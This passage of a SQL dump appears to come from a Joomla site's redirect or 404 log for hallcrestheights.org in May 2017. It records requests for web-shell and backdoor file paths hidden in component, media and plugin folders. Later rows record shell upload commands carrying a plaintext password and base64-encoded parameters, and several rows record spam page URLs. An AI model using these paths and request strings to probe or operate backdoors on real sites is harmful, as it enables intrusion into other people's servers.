00:00:00'),(9070,'http://hallcrestheights.org/components/com_jce/query.php',NULL,'http://hallcrestheights.org/components/com_jce/query.php','',2,0,'2017-05-11 04:10:10','0000-00-00 00:00:00'),(9071,'http://hallcrestheights.org/components/com_media/sz39bi.php',NULL,'http://hallcrestheights.org/components/com_media/sz39bi.php','',2,0,'2017-05-11 04:10:10','0000-00-00 00:00:00'),(9072,'http://hallcrestheights.org/components/com_eventgallery/library/factory/file/backup.php',NULL,'http://hallcrestheights.org/components/com_eventgallery/library/factory/file/backup.php','',2,0,'2017-05-11 04:10:10','0000-00-00 00:00:00'),(9073,'http://hallcrestheights.org/components/com_jevents/views/day/tmpl/config.php',NULL,'http://hallcrestheights.org/components/com_jevents/views/day/tmpl/config.php','',2,0,'2017-05-11 04:10:10','0000-00-00 00:00:00'),(9074,'http://hallcrestheights.org/dd-formmailer/j_ajax.php',NULL,'http://hallcrestheights.org/dd-formmailer/j_ajax.php','',2,0,'2017-05-11 04:10:10','0000-00-00 00:00:00'),(9075,'http://hallcrestheights.org/components/com_wrapper/views/wrapper/setup.php',NULL,'http://hallcrestheights.org/components/com_wrapper/views/wrapper/setup.php','',2,0,'2017-05-11 04:10:11','0000-00-00 00:00:00'),(9076,'http://hallcrestheights.org/images/joomlart/intro-page/stopgloal.php',NULL,'http://hallcrestheights.org/images/joomlart/intro-page/stopgloal.php','',2,0,'2017-05-11 04:10:11','0000-00-00 00:00:00'),(9077,'http://hallcrestheights.org/ess.php',NULL,'http://hallcrestheights.org/ess.php','',2,0,'2017-05-11 04:10:11','0000-00-00 00:00:00'),(9078,'http://hallcrestheights.org/components/com_easyblog/themes/greenie/css/backup.php',NULL,'http://hallcrestheights.org/components/com_easyblog/themes/greenie/css/backup.php','',2,0,'2017-05-11 04:10:13','0000-00-00 00:00:00'),(9079,'http://hallcrestheights.org/libraries/joomla/cache/bookmark.php',NULL,'http://hallcrestheights.org/libraries/joomla/cache/bookmark.php','',2,0,'2017-05-11 04:10:47','0000-00-00 00:00:00'),(9080,'http://hallcrestheights.org/libraries/joomla/cache/gs.php',NULL,'http://hallcrestheights.org/libraries/joomla/cache/gs.php','',4,0,'2017-05-11 04:10:47','0000-00-00 00:00:00'),(9081,'http://hallcrestheights.org/libraries/joomla/document/system.php',NULL,'http://hallcrestheights.org/libraries/joomla/document/system.php','',2,0,'2017-05-11 04:10:47','0000-00-00 00:00:00'),(9082,'http://hallcrestheights.org/libraries/cms/html/language/en-gb/backup.php',NULL,'http://hallcrestheights.org/libraries/cms/html/language/en-gb/backup.php','',2,0,'2017-05-11 04:10:47','0000-00-00 00:00:00'),(9083,'http://hallcrestheights.org/libraries/joomla/cache/.lib_zchiob.php',NULL,'http://hallcrestheights.org/libraries/joomla/cache/.lib_zchiob.php','',2,0,'2017-05-11 04:10:47','0000-00-00 00:00:00'),(9084,'http://hallcrestheights.org/layouts/404.php',NULL,'http://hallcrestheights.org/layouts/404.php','',2,0,'2017-05-11 04:10:47','0000-00-00 00:00:00'),(9085,'http://hallcrestheights.org/includes/logo_img.php',NULL,'http://hallcrestheights.org/includes/logo_img.php','',9,0,'2017-05-11 04:10:47','0000-00-00 00:00:00'),(9086,'http://hallcrestheights.org/libraries/joomla/cache/.lib_p8zz9x.php',NULL,'http://hallcrestheights.org/libraries/joomla/cache/.lib_p8zz9x.php','',2,0,'2017-05-11 04:10:47','0000-00-00 00:00:00'),(9087,'http://hallcrestheights.org/libraries/joomla/github/package/data/backup.php',NULL,'http://hallcrestheights.org/libraries/joomla/github/package/data/backup.php','',2,0,'2017-05-11 04:10:48','0000-00-00 00:00:00'),(9088,'http://hallcrestheights.org/includes/wp-sysmanager.php',NULL,'http://hallcrestheights.org/includes/wp-sysmanager.php','',2,0,'2017-05-11 04:10:48','0000-00-00 00:00:00'),(9089,'http://hallcrestheights.org/libraries/joomla/github/package/data/config.php',NULL,'http://hallcrestheights.org/libraries/joomla/github/package/data/config.php','',2,0,'2017-05-11 04:10:48','0000-00-00 00:00:00'),(9090,'http://hallcrestheights.org/libraries/joomla/cache/.lib_fgzn9d.php',NULL,'http://hallcrestheights.org/libraries/joomla/cache/.lib_fgzn9d.php','',2,0,'2017-05-11 04:10:48','0000-00-00 00:00:00'),(9091,'http://hallcrestheights.org/libraries/joomla/document/feed/backup.php',NULL,'http://hallcrestheights.org/libraries/joomla/document/feed/backup.php','',2,0,'2017-05-11 04:10:49','0000-00-00 00:00:00'),(9092,'http://hallcrestheights.org/media/editors/codemirror/mode/pig/excekkent.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/pig/excekkent.php','',2,0,'2017-05-11 04:11:23','0000-00-00 00:00:00'),(9093,'http://hallcrestheights.org/media/editors/tinymce/skins/lightgray/fonts/htaccess.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/skins/lightgray/fonts/htaccess.php','',2,0,'2017-05-11 04:11:23','0000-00-00 00:00:00'),(9094,'http://hallcrestheights.org/media/editors/codemirror/addon/edit/mysql.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/addon/edit/mysql.php','',2,0,'2017-05-11 04:11:23','0000-00-00 00:00:00'),(9095,'http://hallcrestheights.org/media/editors/codemirror/mode/erlang/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/erlang/config.php','',2,0,'2017-05-11 04:11:23','0000-00-00 00:00:00'),(9096,'http://hallcrestheights.org/media/editors/codemirror/mode/http/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/http/config.php','',2,0,'2017-05-11 04:11:23','0000-00-00 00:00:00'),(9097,'http://hallcrestheights.org/media/kunena/avatars/htaccess.php',NULL,'http://hallcrestheights.org/media/kunena/avatars/htaccess.php','',2,0,'2017-05-11 04:11:23','0000-00-00 00:00:00'),(9098,'http://hallcrestheights.org/media/editors/codemirror/mode/tcl/mysql.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/tcl/mysql.php','',2,0,'2017-05-11 04:11:23','0000-00-00 00:00:00'),(9099,'http://hallcrestheights.org/media/editors/codemirror/mode/jinja2/mysql.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/jinja2/mysql.php','',2,0,'2017-05-11 04:11:23','0000-00-00 00:00:00'),(9100,'http://hallcrestheights.org/media/editors/codemirror/mode/sieve/c0nfig.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/sieve/c0nfig.php','',2,0,'2017-05-11 04:11:23','0000-00-00 00:00:00'),(9101,'http://hallcrestheights.org/media/editors/codemirror/mode/htmlmixed/backup.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/htmlmixed/backup.php','',2,0,'2017-05-11 04:11:23','0000-00-00 00:00:00'),(9102,'http://hallcrestheights.org/media/foundry/4.0/styles/bootstrap/images/htaccess.php',NULL,'http://hallcrestheights.org/media/foundry/4.0/styles/bootstrap/images/htaccess.php','',2,0,'2017-05-11 04:11:23','0000-00-00 00:00:00'),(9103,'http://hallcrestheights.org/media/editors/codemirror/mode/mllike/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/mllike/config.php','',2,0,'2017-05-11 04:11:23','0000-00-00 00:00:00'),(9104,'http://hallcrestheights.org/media/editors/codemirror/addon/edit/backup.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/addon/edit/backup.php','',2,0,'2017-05-11 04:11:24','0000-00-00 00:00:00'),(9105,'http://hallcrestheights.org/media/editors/codemirror/mode/vb/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/vb/config.php','',2,0,'2017-05-11 04:11:24','0000-00-00 00:00:00'),(9106,'http://hallcrestheights.org/media/foundry/3.1/styles/redactor/config.php',NULL,'http://hallcrestheights.org/media/foundry/3.1/styles/redactor/config.php','',2,0,'2017-05-11 04:11:24','0000-00-00 00:00:00'),(9107,'http://hallcrestheights.org/modules/mod_fxprev/libraries/archives.php',NULL,'http://hallcrestheights.org/modules/mod_fxprev/libraries/archives.php','',3,0,'2017-05-11 04:12:33','0000-00-00 00:00:00'),(9108,'http://hallcrestheights.org/modules/mod_articles_archive/tmpl/backup.php',NULL,'http://hallcrestheights.org/modules/mod_articles_archive/tmpl/backup.php','',2,0,'2017-05-11 04:12:33','0000-00-00 00:00:00'),(9109,'http://hallcrestheights.org/modules/mod_ariimageslider/mod_ariimageslider/elements/color/images/setup.php',NULL,'http://hallcrestheights.org/modules/mod_ariimageslider/mod_ariimageslider/elements/color/images/setup.php','',2,0,'2017-05-11 04:12:34','0000-00-00 00:00:00'),(9110,'http://hallcrestheights.org/media/kunena/avatars/resized/size144/ja_playmag/htaccess.php',NULL,'http://hallcrestheights.org/media/kunena/avatars/resized/size144/ja_playmag/htaccess.php','',2,0,'2017-05-11 04:12:34','0000-00-00 00:00:00'),(9111,'http://hallcrestheights.org/plugins/installer/recaptcha.php',NULL,'http://hallcrestheights.org/plugins/installer/recaptcha.php','',2,0,'2017-05-11 04:12:34','0000-00-00 00:00:00'),(9112,'http://hallcrestheights.org/templates/atomic/index.php',NULL,'http://hallcrestheights.org/templates/atomic/index.php','',3,0,'2017-05-11 04:12:34','0000-00-00 00:00:00'),(9113,'http://hallcrestheights.org/media/media/images/mime-icon-16/backup.php',NULL,'http://hallcrestheights.org/media/media/images/mime-icon-16/backup.php','',2,0,'2017-05-11 04:12:34','0000-00-00 00:00:00'),(9114,'http://hallcrestheights.org/modules/mod_apigoogle/mod_apigoogle.php',NULL,'http://hallcrestheights.org/modules/mod_apigoogle/mod_apigoogle.php','',2,0,'2017-05-11 04:12:36','0000-00-00 00:00:00'),(9115,'http://hallcrestheights.org/ssa.php',NULL,'http://hallcrestheights.org/ssa.php','',2,0,'2017-05-11 04:12:37','0000-00-00 00:00:00'),(9116,'http://www.hallcrestheights.org/pcscqr-i20162629-ufunpk-k24656-wxpoid-eotw-tvsoar-mosmge.htm',NULL,'','',1,0,'2017-05-11 09:51:08','0000-00-00 00:00:00'),(9117,'http://www.hallcrestheights.org/jgletk-ymdrqz-nrvmlk-i20162628-swaz-vkecqq-k5836-neeiaq-jzlnp.htm',NULL,'','',2,0,'2017-05-11 15:30:17','0000-00-00 00:00:00'),(9118,'http://hallcrestheights.org/components/.lib_llkops.php',NULL,'http://hallcrestheights.org/components/.lib_llkops.php','',1,0,'2017-05-11 20:55:21','0000-00-00 00:00:00'),(9119,'http://hallcrestheights.org/components/com_kunena/template/crypsis/css/config.php',NULL,'http://hallcrestheights.org/components/com_kunena/template/crypsis/css/config.php','',1,0,'2017-05-11 20:55:56','0000-00-00 00:00:00'),(9120,'http://hallcrestheights.org/components/com_easyblog/assets/images/media/config.php',NULL,'http://hallcrestheights.org/components/com_easyblog/assets/images/media/config.php','',1,0,'2017-05-11 20:55:57','0000-00-00 00:00:00'),(9121,'http://hallcrestheights.org/components/com_config/view/modules/tmpl/backup.php',NULL,'http://hallcrestheights.org/components/com_config/view/modules/tmpl/backup.php','',1,0,'2017-05-11 20:55:57','0000-00-00 00:00:00'),(9122,'http://hallcrestheights.org/components/com_users/views/remind/tmpl/backup.php',NULL,'http://hallcrestheights.org/components/com_users/views/remind/tmpl/backup.php','',1,0,'2017-05-11 20:56:28','0000-00-00 00:00:00'),(9123,'http://hallcrestheights.org/components/com_wrapper/wrapper.i.php',NULL,'http://hallcrestheights.org/components/com_wrapper/wrapper.i.php','',1,0,'2017-05-11 20:56:29','0000-00-00 00:00:00'),(9124,'http://hallcrestheights.org/images/sampledata/parks/landscape/backup.php',NULL,'http://hallcrestheights.org/images/sampledata/parks/landscape/backup.php','',1,0,'2017-05-11 20:56:29','0000-00-00 00:00:00'),(9125,'http://hallcrestheights.org/libraries/cms/less/formatter/backup.php',NULL,'http://hallcrestheights.org/libraries/cms/less/formatter/backup.php','',1,0,'2017-05-11 20:57:06','0000-00-00 00:00:00'),(9126,'http://hallcrestheights.org/language/overrides/ms-default-base.php',NULL,'http://hallcrestheights.org/language/overrides/ms-default-base.php','',1,0,'2017-05-11 20:57:06','0000-00-00 00:00:00'),(9127,'http://hallcrestheights.org/media/editors/codemirror/mode/python/mysql.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/python/mysql.php','',1,0,'2017-05-11 20:57:39','0000-00-00 00:00:00'),(9128,'http://hallcrestheights.org/media/editors/codemirror/mode/ntriples/backup.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/ntriples/backup.php','',1,0,'2017-05-11 20:57:39','0000-00-00 00:00:00'),(9129,'http://hallcrestheights.org/media/editors/codemirror/mode/sieve/mysql.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/sieve/mysql.php','',1,0,'2017-05-11 20:57:39','0000-00-00 00:00:00'),(9130,'http://hallcrestheights.org/media/editors/codemirror/mode/smalltalk/mysql.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/smalltalk/mysql.php','',1,0,'2017-05-11 20:57:39','0000-00-00 00:00:00'),(9131,'http://hallcrestheights.org/media/editors/codemirror/mode/nsis/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/nsis/config.php','',1,0,'2017-05-11 20:57:40','0000-00-00 00:00:00'),(9132,'http://hallcrestheights.org/media/editors/codemirror/mode/scheme/mysql.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/scheme/mysql.php','',1,0,'2017-05-11 20:57:40','0000-00-00 00:00:00'),(9133,'http://hallcrestheights.org/media/foundry/3.1/scripts/event/config.php',NULL,'http://hallcrestheights.org/media/foundry/3.1/scripts/event/config.php','',1,0,'2017-05-11 20:58:11','0000-00-00 00:00:00'),(9134,'http://hallcrestheights.org/media/editors/codemirror/mode/sparql/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/sparql/config.php','',1,0,'2017-05-11 20:58:11','0000-00-00 00:00:00'),(9135,'http://hallcrestheights.org/media/editors/codemirror/mode/vhdl/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/vhdl/config.php','',1,0,'2017-05-11 20:58:11','0000-00-00 00:00:00'),(9136,'http://hallcrestheights.org/media/editors/tinymce/plugins/visualblocks/update.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/plugins/visualblocks/update.php','',1,0,'2017-05-11 20:58:11','0000-00-00 00:00:00'),(9137,'http://hallcrestheights.org/media/foundry/3.1/styles/font-awesome/font/htaccess.php',NULL,'http://hallcrestheights.org/media/foundry/3.1/styles/font-awesome/font/htaccess.php','',1,0,'2017-05-11 20:58:11','0000-00-00 00:00:00'),(9138,'http://hallcrestheights.org/media/editors/tinymce/plugins/visualblocks/css/htaccess.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/plugins/visualblocks/css/htaccess.php','',1,0,'2017-05-11 20:58:12','0000-00-00 00:00:00'),(9139,'http://hallcrestheights.org/media/editors/tinymce/plugins/emoticons/img/htaccess.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/plugins/emoticons/img/htaccess.php','',4,0,'2017-05-11 20:58:12','0000-00-00 00:00:00'),(9140,'http://hallcrestheights.org/media/editors/codemirror/mode/sql/c0nfig.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/sql/c0nfig.php','',1,0,'2017-05-11 20:58:12','0000-00-00 00:00:00'),(9141,'http://hallcrestheights.org/media/editors/tinymce/plugins/hr/backup.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/plugins/hr/backup.php','',1,0,'2017-05-11 20:58:12','0000-00-00 00:00:00'),(9142,'http://hallcrestheights.org/media/editors/tinymce/plugins/searchreplace/mysql.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/plugins/searchreplace/mysql.php','',1,0,'2017-05-11 20:58:12','0000-00-00 00:00:00'),(9143,'http://hallcrestheights.org/media/editors/tinymce/plugins/importcss/ini.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/plugins/importcss/ini.php','',1,0,'2017-05-11 20:58:12','0000-00-00 00:00:00'),(9144,'http://hallcrestheights.org/media/foundry/4.0/styles/rangeslider/mysql.php',NULL,'http://hallcrestheights.org/media/foundry/4.0/styles/rangeslider/mysql.php','',1,0,'2017-05-11 20:58:45','0000-00-00 00:00:00'),(9145,'http://hallcrestheights.org/media/foundry/4.0/styles/chosen/config.php',NULL,'http://hallcrestheights.org/media/foundry/4.0/styles/chosen/config.php','',1,0,'2017-05-11 20:58:46','0000-00-00 00:00:00'),(9146,'http://hallcrestheights.org/media/foundry/4.0/styles/uniform/images/htaccess.php',NULL,'http://hallcrestheights.org/media/foundry/4.0/styles/uniform/images/htaccess.php','',1,0,'2017-05-11 20:58:46','0000-00-00 00:00:00'),(9147,'http://hallcrestheights.org/media/foundry/4.0/scripts/event/mysql.php',NULL,'http://hallcrestheights.org/media/foundry/4.0/scripts/event/mysql.php','',1,0,'2017-05-11 20:58:46','0000-00-00 00:00:00'),(9148,'http://hallcrestheights.org/modules/mod_feed/san1.php',NULL,'http://hallcrestheights.org/modules/mod_feed/san1.php','',1,0,'2017-05-11 20:58:46','0000-00-00 00:00:00'),(9149,'http://hallcrestheights.org/modules/mod_crontab/mod_crontab.php',NULL,'http://hallcrestheights.org/modules/mod_crontab/mod_crontab.php','',1,0,'2017-05-11 20:58:46','0000-00-00 00:00:00'),(9150,'http://hallcrestheights.org/modules/mod_articles_news/setup.php',NULL,'http://hallcrestheights.org/modules/mod_articles_news/setup.php','',1,0,'2017-05-11 20:58:46','0000-00-00 00:00:00'),(9151,'http://hallcrestheights.org/modules/mod_feed/newstraler.php',NULL,'http://hallcrestheights.org/modules/mod_feed/newstraler.php','',1,0,'2017-05-11 20:58:47','0000-00-00 00:00:00'),(9152,'http://hallcrestheights.org/modules/mod_responsive_contact_form/mod_articles_categories.php',NULL,'http://hallcrestheights.org/modules/mod_responsive_contact_form/mod_articles_categories.php','',1,0,'2017-05-11 20:59:19','0000-00-00 00:00:00'),(9153,'http://hallcrestheights.org/modules/mod_joomlaapi/mod_joomlaapi.php',NULL,'http://hallcrestheights.org/modules/mod_joomlaapi/mod_joomlaapi.php','',1,0,'2017-05-11 20:59:20','0000-00-00 00:00:00'),(9154,'http://hallcrestheights.org/modules/mod_xmlrpc/mod_xmlrpc.php',NULL,'http://hallcrestheights.org/modules/mod_xmlrpc/mod_xmlrpc.php','',2,0,'2017-05-11 20:59:20','0000-00-00 00:00:00'),(9155,'http://hallcrestheights.org/modules/mod_feed/widget.php',NULL,'http://hallcrestheights.org/modules/mod_feed/widget.php','',1,0,'2017-05-11 20:59:20','0000-00-00 00:00:00'),(9156,'http://hallcrestheights.org/plugins/content/kunenadiscuss/language/fa-ir/backup.php',NULL,'http://hallcrestheights.org/plugins/content/kunenadiscuss/language/fa-ir/backup.php','',1,0,'2017-05-11 20:59:20','0000-00-00 00:00:00'),(9157,'http://hallcrestheights.org/modules/mod_kunenastats/language/bs-ba/1update.php',NULL,'http://hallcrestheights.org/modules/mod_kunenastats/language/bs-ba/1update.php','',1,0,'2017-05-11 20:59:20','0000-00-00 00:00:00'),(9158,'http://hallcrestheights.org/plugins/fields/integer/tmpl/1update.php',NULL,'http://hallcrestheights.org/plugins/fields/integer/tmpl/1update.php','',1,0,'2017-05-11 20:59:20','0000-00-00 00:00:00'),(9159,'http://hallcrestheights.org/modules/mod_media_style/mod_media_style.php',NULL,'http://hallcrestheights.org/modules/mod_media_style/mod_media_style.php','',1,0,'2017-05-11 20:59:20','0000-00-00 00:00:00'),(9160,'http://hallcrestheights.org/plugins/content/kunenadiscuss/language/kz-kz/config.php',NULL,'http://hallcrestheights.org/plugins/content/kunenadiscuss/language/kz-kz/config.php','',1,0,'2017-05-11 20:59:20','0000-00-00 00:00:00'),(9161,'http://hallcrestheights.org/plugins/installer/totp.php',NULL,'http://hallcrestheights.org/plugins/installer/totp.php','',1,0,'2017-05-11 20:59:21','0000-00-00 00:00:00'),(9162,'http://hallcrestheights.org/plugins/installer/codemirror.php',NULL,'http://hallcrestheights.org/plugins/installer/codemirror.php','',1,0,'2017-05-11 20:59:21','0000-00-00 00:00:00'),(9163,'http://hallcrestheights.org/templates/beez/html/mod_newsflash/node.module.php',NULL,'http://hallcrestheights.org/templates/beez/html/mod_newsflash/node.module.php','',1,0,'2017-05-11 20:59:55','0000-00-00 00:00:00'),(9164,'http://hallcrestheights.org/templates/arc/artx.php',NULL,'http://hallcrestheights.org/templates/arc/artx.php','',1,0,'2017-05-11 20:59:55','0000-00-00 00:00:00'),(9165,'http://hallcrestheights.org/plugins/system/nnframework/fields/akeebasubs.html.php',NULL,'http://hallcrestheights.org/plugins/system/nnframework/fields/akeebasubs.html.php','',1,0,'2017-05-11 20:59:55','0000-00-00 00:00:00'),(9166,'http://hallcrestheights.org/templates/simple_v1/html/layouts/joomla/config.php',NULL,'http://hallcrestheights.org/templates/simple_v1/html/layouts/joomla/config.php','',1,0,'2017-05-11 20:59:55','0000-00-00 00:00:00'),(9167,'http://hallcrestheights.org/styles/popup-pomo.php',NULL,'http://hallcrestheights.org/styles/popup-pomo.php','',7,0,'2017-05-11 20:59:55','0000-00-00 00:00:00'),(9168,'http://hallcrestheights.org/templates/arc/pagination.php',NULL,'http://hallcrestheights.org/templates/arc/pagination.php','',1,0,'2017-05-11 20:59:55','0000-00-00 00:00:00'),(9169,'http://hallcrestheights.org/popup-pomo.php',NULL,'http://hallcrestheights.org/popup-pomo.php','',6,0,'2017-05-11 20:59:56','0000-00-00 00:00:00'),(9170,'http://hallcrestheights.org/templates/ja_purity/html/com_content/dashboard.module.php',NULL,'http://hallcrestheights.org/templates/ja_purity/html/com_content/dashboard.module.php','',1,0,'2017-05-11 20:59:56','0000-00-00 00:00:00'),(9171,'http://hallcrestheights.org/templates/atomic/system.php',NULL,'http://hallcrestheights.org/templates/atomic/system.php','',1,0,'2017-05-11 20:59:56','0000-00-00 00:00:00'),(9172,'http://hallcrestheights.org/templates/purity_iii/html/com_finder/backup.php',NULL,'http://hallcrestheights.org/templates/purity_iii/html/com_finder/backup.php','',1,0,'2017-05-11 20:59:56','0000-00-00 00:00:00'),(9173,'http://hallcrestheights.org/plugins/system/t3/base-bs3/html/mod_breadcrumbs/htaccess.php',NULL,'http://hallcrestheights.org/plugins/system/t3/base-bs3/html/mod_breadcrumbs/htaccess.php','',1,0,'2017-05-11 20:59:56','0000-00-00 00:00:00'),(9174,'http://hallcrestheights.org/plugins/system/t3/excekkent.php',NULL,'http://hallcrestheights.org/plugins/system/t3/excekkent.php','',1,0,'2017-05-11 20:59:56','0000-00-00 00:00:00'),(9175,'http://hallcrestheights.org/templates/arc/language/error.php',NULL,'http://hallcrestheights.org/templates/arc/language/error.php','',1,0,'2017-05-11 20:59:57','0000-00-00 00:00:00'),(9176,'http://www.hallcrestheights.org/soegszx-yifet-vtndyu-uhvfcy-zlsxx-k55773-qrox-i20162630-aehksk-xyxemb/',NULL,'','',2,0,'2017-05-12 03:28:30','0000-00-00 00:00:00'),(9177,'http://www.hallcrestheights.org/oiyizg-olrcmwfb-snop-i20162628-dgfnh-k57949-skrl/',NULL,'','',4,0,'2017-05-12 03:33:11','0000-00-00 00:00:00'),(9178,'http://www.hallcrestheights.org/fadlajfn-lgfpc-k15080-vwgmyhde-i20162631-cwxbdeu-dkov-fiibp.htm',NULL,'','',1,0,'2017-05-12 05:38:34','0000-00-00 00:00:00'),(9179,'http://www.hallcrestheights.org/ixnmueah-whioz-hjxbnwpg-k50620-eyooayi-kuks-szqce-i20162631-baqdom.htm',NULL,'http://search.yahoo.co.jp/','',2,0,'2017-05-12 09:01:53','0000-00-00 00:00:00'),(9180,'http://www.hallcrestheights.org/k43928-vqjnysp-i20162637-vholjpeu-rrtpiluo-urxivlb.htm',NULL,'','',2,0,'2017-05-12 18:13:02','0000-00-00 00:00:00'),(9181,'http://www.hallcrestheights.org/fadl-ajfnlgf-k312-pcvwg-myhdec-i20162634-wxbdeud-kovfiibp-tquhzxc-hhrmxagf-papu-hgfqvjdc.htm',NULL,'','',13,0,'2017-05-13 08:14:15','0000-00-00 00:00:00'),(9182,'http://hallcrestheights.org//error.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',4,0,'2017-05-13 23:51:30','0000-00-00 00:00:00'),(9183,'http://hallcrestheights.org//tmp/error.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',4,0,'2017-05-13 23:51:32','0000-00-00 00:00:00'),(9184,'http://hallcrestheights.org//sqlbak.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-13 23:52:10','0000-00-00 00:00:00'),(9185,'http://hallcrestheights.org//sql-bak.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:52:12','0000-00-00 00:00:00'),(9186,'http://hallcrestheights.org//email.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:52:19','0000-00-00 00:00:00'),(9187,'http://hallcrestheights.org//functions.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:52:23','0000-00-00 00:00:00'),(9188,'http://hallcrestheights.org//cache/news.php?z3=MndOUVY0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:52:34','0000-00-00 00:00:00'),(9189,'http://hallcrestheights.org//tmp.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',5,0,'2017-05-13 23:52:40','0000-00-00 00:00:00'),(9190,'http://hallcrestheights.org//shootme.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',8,0,'2017-05-13 23:52:45','0000-00-00 00:00:00'),(9191,'http://hallcrestheights.org//configurationbak.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:52:50','0000-00-00 00:00:00'),(9192,'http://hallcrestheights.org//robots.txt.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:52:56','0000-00-00 00:00:00'),(9193,'http://hallcrestheights.org//jconfig.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:53:02','0000-00-00 00:00:00'),(9194,'http://hallcrestheights.org//media/reads.php?z3=MndOUVY0LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:53:06','0000-00-00 00:00:00'),(9195,'http://hallcrestheights.org//pols.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:53:11','0000-00-00 00:00:00'),(9196,'http://hallcrestheights.org//imdex.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:53:15','0000-00-00 00:00:00'),(9197,'http://hallcrestheights.org//aa.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:53:21','0000-00-00 00:00:00'),(9198,'http://hallcrestheights.org//ytt.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:53:26','0000-00-00 00:00:00'),(9199,'http://hallcrestheights.org//wp-coments.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',4,0,'2017-05-13 23:53:31','0000-00-00 00:00:00'),(9200,'http://hallcrestheights.org//media/1ndex.php?z3=MndOUVY0LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:53:59','0000-00-00 00:00:00'),(9201,'http://hallcrestheights.org//libraries/joomla/jmails.php?z3=MndOUVY0LnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:54:03','0000-00-00 00:00:00'),(9202,'http://hallcrestheights.org//sql_dump.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:54:06','0000-00-00 00:00:00'),(9203,'http://hallcrestheights.org//error-logs.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:54:18','0000-00-00 00:00:00'),(9204,'http://hallcrestheights.org//media/404.php?z3=MndOUVY0LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:54:23','0000-00-00 00:00:00'),(9205,'http://hallcrestheights.org//media/tmp.php?z3=MndOUVY0LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:54:29','0000-00-00 00:00:00'),(9206,'http://hallcrestheights.org//r3x.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:54:33','0000-00-00 00:00:00'),(9207,'http://hallcrestheights.org//log.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:54:38','0000-00-00 00:00:00'),(9208,'http://hallcrestheights.org//images/stories/0day.php?z3=MndOUVY0LnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:54:45','0000-00-00 00:00:00'),(9209,'http://hallcrestheights.org//includes/u2p.php?z3=MndOUVY0LnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:54:52','0000-00-00 